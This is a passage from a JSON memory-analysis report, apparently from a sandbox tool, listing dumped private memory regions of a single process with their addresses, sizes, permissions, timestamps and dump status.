null, "region_type": "private_memory", "start_va": 80347136, "timestamp": "00:00:38.107", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000417-addr_0x0000000004cb0000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_27", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 80412672, "type": "region", "version": 1 }, "end_va": 80416767, "entry_point": 0, "filename": null, "id": "region_417", "name": "private_0x0000000004cb0000", "norm_filename": null, "region_type": "private_memory", "start_va": 80412672, "timestamp": "00:00:38.107", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000418-addr_0x0000000004cc0000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_28", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 80478208, "type": "region", "version": 1 }, "end_va": 80482303, "entry_point": 0, "filename": null, "id": "region_418", "name": "private_0x0000000004cc0000", "norm_filename": null, "region_type": "private_memory", "start_va": 80478208, "timestamp": "00:00:38.108", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000419-addr_0x0000000004dd0000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_29", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 81592320, "type": "region", "version": 1 }, "end_va": 81596415, "entry_point": 0, "filename": null, "id": "region_419", "name": "private_0x0000000004dd0000", "norm_filename": null, "region_type": "private_memory", "start_va": 81592320, "timestamp": "00:00:38.108", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000420-addr_0x0000000004de0000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_30", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 81657856, "type": "region", "version": 1 }, "end_va": 81661951, "entry_point": 0, "filename": null, "id": "region_420", "name": "private_0x0000000004de0000", "norm_filename": null, "region_type": "private_memory", "start_va": 81657856, "timestamp": "00:00:38.108", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000421-addr_0x0000000004df0000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_31", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 81723392, "type": "region", "version": 1 }, "end_va": 81727487, "entry_point": 0, "filename": null, "id": "region_421", "name": "private_0x0000000004df0000", "norm_filename": null, "region_type": "private_memory", "start_va": 81723392, "timestamp": "00:00:38.108", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000422-addr_0x0000000005680000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_32", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 90701824, "type": "region", "version": 1 }, "end_va": 90705919, "entry_point": 0, "filename": null, "id": "region_422", "name": "private_0x0000000005680000", "norm_filename": null, "region_type": "private_memory", "start_va": 90701824, "timestamp": "00:00:38.109", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000423-addr_0x0000000005690000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_33", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 90767360, "type": "region", "version": 1 }, "end_va": 90771455, "entry_point": 0, "filename": null, "id": "region_423", "name": "private_0x0000000005690000", "norm_filename": null, "region_type": "private_memory", "start_va": 90767360, "timestamp": "00:00:38.109", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000424-addr_0x00000000056a0000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_34", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 90832896, "type": "region", "version": 1 }, "end_va": 90836991, "entry_point": 0, "filename": null, "id": "region_424", "name": "private_0x00000000056a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 90832896, "timestamp": "00:00:38.109", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000425-addr_0x00000000056b0000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_35", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 90898432, "type": "region", "version": 1 }, "end_va": 90902527, "entry_point": 0, "filename": null, "id": "region_425", "name": "private_0x00000000056b0000", "norm_filename": null, "region_type": "private_memory", "start_va": 90898432, "timestamp": "00:00:38.110", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000426-addr_0x00000000056c0000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_36", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 90963968, "type": "region", "version": 1 }, "end_va": 90968063, "entry_point": 0, "filename": null, "id": "region_426", "name": "private_0x00000000056c0000", "norm_filename": null, "region_type": "private_memory", "start_va": 90963968, "timestamp": "00:00:38.110", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000427-addr_0x00000000056d0000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_37", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 91029504, "type": "region", "version": 1 }, "end_va": 91033599, "entry_point": 0, "filename": null, "id": "region_427", "name": "private_0x00000000056d0000", "norm_filename": null, "region_type": "private_memory", "start_va": 91029504, "timestamp": "00:00:38.110", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000428-addr_0x00000000058e0000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_38", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 93192192, "type": "region", "version": 1 }, "end_va": 93196287, "entry_point": 0, "filename": null, "id": "region_428", "name": "private_0x00000000058e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 93192192, "timestamp": "00:00:38.111", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000429-addr_0x00000000058f0000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_39", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 93257728, "type": "region", "version": 1 }, "end_va": 93261823, "entry_point": 0, "filename": null, "id": "region_429", "name": "private_0x00000000058f0000", "norm_filename": null, "region_type": "private_memory", "start_va": 93257728, "timestamp": "00:00:38.111", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000430-addr_0x0000000005900000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_40", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 93323264, "type": "region", "version": 1 }, "end_va": 93327359, "entry_point": 0, "filename": null, "id": "region_430", "name": "private_0x0000000005900000", "norm_filename": null, "region_type": "private_memory", "start_va": 93323264, "timestamp": "00:00:38.111", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000431-addr_0x0000000005910000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_41", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 93388800, "type": "region", "version": 1 }, "end_va": 93392895, "entry_point": 0, "filename": null, "id": "region_431", "name": "private_0x0000000005910000", "norm_filename": null, "region_type": "private_memory", "start_va": 93388800, "timestamp": "00:00:38.111", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000432-addr_0x0000000005920000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_42", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 93454336, "type": "region", "version": 1 }, "end_va": 93458431, "entry_point": 0, "filename": null, "id": "region_432", "name": "private_0x0000000005920000", "norm_filename": null, "region_type": "private_memory", "start_va": 93454336, "timestamp": "00:00:38.112", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000433-addr_0x00000000059b0000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_43", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 94044160, "type": "region", "version": 1 }, "end_va": 94048255, "entry_point": 0, "filename": null, "id": "region_433", "name": "private_0x00000000059b0000", "norm_filename": null, "region_type": "private_memory", "start_va": 94044160, "timestamp": "00:00:38.112", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000434-addr_0x00000000059c0000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_44", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 94109696, "type": "region", "version": 1 }, "end_va": 94113791, "entry_point": 0, "filename": null, "id": "region_434", "name": "private_0x00000000059c0000", "norm_filename": null, "region_type": "private_memory", "start_va": 94109696, "timestamp": "00:00:38.112", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000435-addr_0x0000000005a50000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_45", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 94699520, "type": "region", "version": 1 }, "end_va": 94703615, "entry_point": 0, "filename": null, "id": "region_435", "name": "private_0x0000000005a50000", "norm_filename": null, "region_type": "private_memory", "start_va": 94699520, "timestamp": "00:00:38.112", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000436-addr_0x0000000005a60000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_46", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 94765056, "type": "region", "version": 1 }, "end_va": 94769151, "entry_point": 0, "filename": null, "id": "region_436", "name": "private_0x0000000005a60000", "norm_filename": null, "region_type": "private_memory", "start_va": 94765056, "timestamp": "00:00:38.113", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000437-addr_0x0000000005a70000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_47", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 94830592, "type": "region", "version": 1 }, "end_va": 94834687, "entry_point": 0, "filename": null, "id": "region_437", "name": "private_0x0000000005a70000", "norm_filename": null, "region_type": "private_memory", "start_va": 94830592, "timestamp": "00:00:38.113", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000438-addr_0x0000000006e90000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_48", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 115933184, "type": "region", "version": 1 }, "end_va": 115937279, "entry_point": 0, "filename": null, "id": "region_438", "name": "private_0x0000000006e90000", "norm_filename": null, "region_type": "private_memory", "start_va": 115933184, "timestamp": "00:00:38.114", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000439-addr_0x0000000006ea0000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_49", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 115998720, "type": "region", "version": 1 }, "end_va": 116002815, "entry_point": 0, "filename": null, "id": "region_439", "name": "private_0x0000000006ea0000", "norm_filename": null, "region_type": "private_memory", "start_va": 115998720, "timestamp": "00:00:38.114", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000440-addr_0x0000000006eb0000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_50", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 116064256, "type": "region", "version": 1 }, "end_va": 116068351, "entry_point": 0, "filename": null, "id": "region_440", "name": "private_0x0000000006eb0000", "norm_filename": null, "region_type": "private_memory", "start_va": 116064256, "timestamp": "00:00:38.114", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000441-addr_0x0000000006ec0000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_51", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 116129792, "type": "region", "version": 1 }, "end_va": 116133887, "entry_point": 0, "filename": null, "id": "region_441", "name": "private_0x0000000006ec0000", "norm_filename": null, "region_type": "private_memory", "start_va": 116129792, "timestamp": "00:00:38.115", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000445-addr_0x000007fffff74000-size_0x0000000000002000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_52", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 8192, "start_va": 8796092448768, "type": "region", "version": 1 }, "end_va": 8796092456959, "entry_point": 0, "filename": null, "id": "region_445", "name": "private_0x000007fffff74000", "norm_filename": null, "region_type": "private_memory", "start_va": 8796092448768, "timestamp": "00:00:38.131", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000446-addr_0x000007fffff76000-size_0x0000000000002000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_53", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 8192, "start_va": 8796092456960, "type": "region", "version": 1 }, "end_va": 8796092465151, "entry_point": 0, "filename": null, "id": "region_446", "name": "private_0x000007fffff76000", "norm_filename": null, "region_type": "private_memory", "start_va": 8796092456960, "timestamp": "00:00:38.131", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000453-addr_0x0000000002590000-size_0x000000000000f000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_54", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 61440, "start_va": 39387136, "type": "region", "version": 1 }, "end_va": 39448575, "entry_point": 0, "filename": null, "id": "region_453", "name": "private_0x0000000002590000", "norm_filename": null, "region_type": "private_memory", "start_va": 39387136, "timestamp": "00:00:38.539", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000455-addr_0x0000000002a20000-size_0x000000000001f000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_55", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 126976, "start_va": 44171264, "type": "region", "version": 1 }, "end_va": 44298239, "entry_point": 0, "filename": null, "id": "region_455", "name": "private_0x0000000002a20000", "norm_filename": null, "region_type": "private_memory", "start_va": 44171264, "timestamp": "00:00:38.540", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000459-addr_0x0000000009ee0000-size_0x0000000000100000-perm_rw.bin", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_56", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 166592512, "type": "region", "version": 1 }, "end_va": 167641087, "entry_point": 0, "filename": null, "id": "region_459", "name": "private_0x0000000009ee0000", "norm_filename": null, "region_type": "private_memory", "start_va": 166592512, "timestamp": "00:00:38.541", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000461-addr_0x000007fffff72000-size_0x0000000000002000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_57", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 8192, "start_va": 8796092440576, "type": "region", "version": 1 }, "end_va": 8796092448767, "entry_point": 0, "filename": null, "id": "region_461", "name": "private_0x000007fffff72000", "norm_filename": null, "region_type": "private_memory", "start_va": 8796092440576, "timestamp": "00:00:38.551", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000463-addr_0x0000000002720000-size_0x0000000000002000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_58", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 8192, "start_va": 41025536, "type": "region", "version": 1 }, "end_va": 41033727, "entry_point": 0, "filename": null, "id": "region_463", "name": "private_0x0000000002720000", "norm_filename": null, "region_type": "private_memory", "start_va": 41025536, "timestamp": "00:00:38.964", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000464-addr_0x00000000058e0000-size_0x000000000001f000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_59", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 126976, "start_va": 93192192, "type": "region", "version": 1 }, "end_va": 93319167, "entry_point": 0, "filename": null, "id": "region_464", "name": "private_0x00000000058e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 93192192, "timestamp": "00:00:38.965", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000465-addr_0x0000000005a50000-size_0x000000000001f000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_60", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 126976, "start_va": 94699520, "type": "region", "version": 1 }, "end_va": 94826495, "entry_point": 0, "filename": null, "id": "region_465", "name": "private_0x0000000005a50000", "norm_filename": null, "region_type": "private_memory", "start_va": 94699520, "timestamp": "00:00:38.965", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000466-addr_0x0000000006e90000-size_0x0000000000021000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_61", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 135168, "start_va": 115933184, "type": "region", "version": 1 }, "end_va": 116068351, "entry_point": 0, "filename": null, "id": "region_466", "name": "private_0x0000000006e90000", "norm_filename": null, "region_type": "private_memory", "start_va": 115933184, "timestamp": "00:00:38.965", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000467-addr_0x0000000007000000-size_0x000000000001f000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_62", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 126976, "start_va": 117440512, "type": "region", "version": 1 }, "end_va": 117567487, "entry_point": 0, "filename": null, "id": "region_467", "name": "private_0x0000000007000000", "norm_filename": null, "region_type": "private_memory", "start_va": 117440512, "timestamp": "00:00:38.966", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000471-addr_0x000000000a130000-size_0x0000000000080000-perm_rw.bin", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_63", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 524288, "start_va": 169017344, "type": "region", "version": 1 }, "end_va": 169541631, "entry_point": 0, "filename": null, "id": "region_471", "name": "private_0x000000000a130000", "norm_filename": null, "region_type": "private_memory", "start_va": 169017344, "timestamp": "00:00:39.051", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000484-addr_0x000000000a320000-size_0x0000000000080000-perm_rwx.bin", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_64", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 524288, "start_va": 171048960, "type": "region", "version": 1 }, "end_va": 171573247, "entry_point": 0, "filename": null, "id": "region_484", "name": "private_0x000000000a320000", "norm_filename": null, "region_type": "private_memory", "start_va": 171048960, "timestamp": "00:00:39.942", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000489-addr_0x0000000009400000-size_0x0000000000020000-perm_.bin", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "" ], "ref_process_dump": { "ref_id": "proc_dump_65", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 131072, "start_va": 155189248, "type": "region", "version": 1 }, "end_va": 155320319, "entry_point": 0, "filename": null, "id": "region_489", "name": "private_0x0000000009400000", "norm_filename": null, "region_type": "private_memory", "start_va": 155189248, "timestamp": "00:00:41.579", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000490-addr_0x0000000009fe0000-size_0x0000000000100000-perm_rw.bin", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_66", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 167641088, "type": "region", "version": 1 }, "end_va": 168689663, "entry_point": 0, "filename": null, "id": "region_490", "name": "private_0x0000000009fe0000", "norm_filename": null, "region_type": "private_memory", "start_va": 167641088, "timestamp": "00:00:41.579", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000492-addr_0x000000000a3a0000-size_0x0000000000101000-perm_rw.bin", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_67", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1052672, "start_va": 171573248, "type": "region", "version": 1 }, "end_va": 172625919, "entry_point": 0, "filename": null, "id": "region_492", "name": "private_0x000000000a3a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 171573248, "timestamp": "00:00:41.580", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000493-addr_0x000000000a570000-size_0x0000000000010000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_68", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 173473792, "type": "region", "version": 1 }, "end_va": 173539327, "entry_point": 0, "filename": null, "id": "region_493", "name": "private_0x000000000a570000", "norm_filename": null, "region_type": "private_memory", "start_va": 173473792, "timestamp": "00:00:41.580", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000495-addr_0x0000000022580000-size_0x00000000006d0000-perm_rw.bin", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_69", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 7143424, "start_va": 576192512, "type": "region", "version": 1 }, "end_va": 583335935, "entry_point": 0, "filename": null, "id": "region_495", "name": "private_0x0000000022580000", "norm_filename": null, "region_type": "private_memory", "start_va": 576192512, "timestamp": "00:00:41.588", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000500-addr_0x000007ff00050000-size_0x0000000000010000-perm_.bin", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "" ], "ref_process_dump": { "ref_id": "proc_dump_70", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 8791798382592, "type": "region", "version": 1 }, "end_va": 8791798448127, "entry_point": 0, "filename": null, "id": "region_500", "name": "private_0x000007ff00050000", "norm_filename": null, "region_type": "private_memory", "start_va": 8791798382592, "timestamp": "00:00:41.597", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000502-addr_0x000007ff00100000-size_0x0000000000010000-perm_.bin", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "" ], "ref_process_dump": { "ref_id": "proc_dump_71", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 8791799103488, "type": "region", "version": 1 }, "end_va": 8791799169023, "entry_point": 0, "filename": null, "id": "region_502", "name": "private_0x000007ff00100000", "norm_filename": null, "region_type": "private_memory", "start_va": 8791799103488, "timestamp": "00:00:41.597", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000503-addr_0x000007ff00110000-size_0x0000000000070000-perm_.bin", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "" ], "ref_process_dump": { "ref_id": "proc_dump_72", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 458752, "start_va": 8791799169024, "type": "region", "version": 1 }, "end_va": 8791799627775, "entry_point": 0, "filename": null, "id": "region_503", "name": "private_0x000007ff00110000", "norm_filename": null, "region_type": "private_memory", "start_va": 8791799169024, "timestamp": "00:00:41.598", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000504-addr_0x000007fffff6c000-size_0x0000000000002000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_73", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 8192, "start_va": 8796092416000, "type": "region", "version": 1 }, "end_va": 8796092424191, "entry_point": 0, "filename": null, "id": "region_504", "name": "private_0x000007fffff6c000", "norm_filename": null, "region_type": "private_memory", "start_va": 8796092416000, "timestamp": "00:00:41.600", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000505-addr_0x000007fffff6e000-size_0x0000000000002000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_74", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 8192, "start_va": 8796092424192, "type": "region", "version": 1 }, "end_va": 8796092432383, "entry_point": 0, "filename": null, "id": "region_505", "name": "private_0x000007fffff6e000", "norm_filename": null, "region_type": "private_memory", "start_va": 8796092424192, "timestamp": "00:00:41.600", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000506-addr_0x000007fffff70000-size_0x0000000000002000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_75", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 8192, "start_va": 8796092432384, "type": "region", "version": 1 }, "end_va": 8796092440575, "entry_point": 0, "filename": null, "id": "region_506", "name": "private_0x000007fffff70000", "norm_filename": null, "region_type": "private_memory", "start_va": 8796092432384, "timestamp": "00:00:41.601", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000509-addr_0x000007ffffec0000-size_0x0000000000010000-perm_rwx.bin", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable", "executable" ], 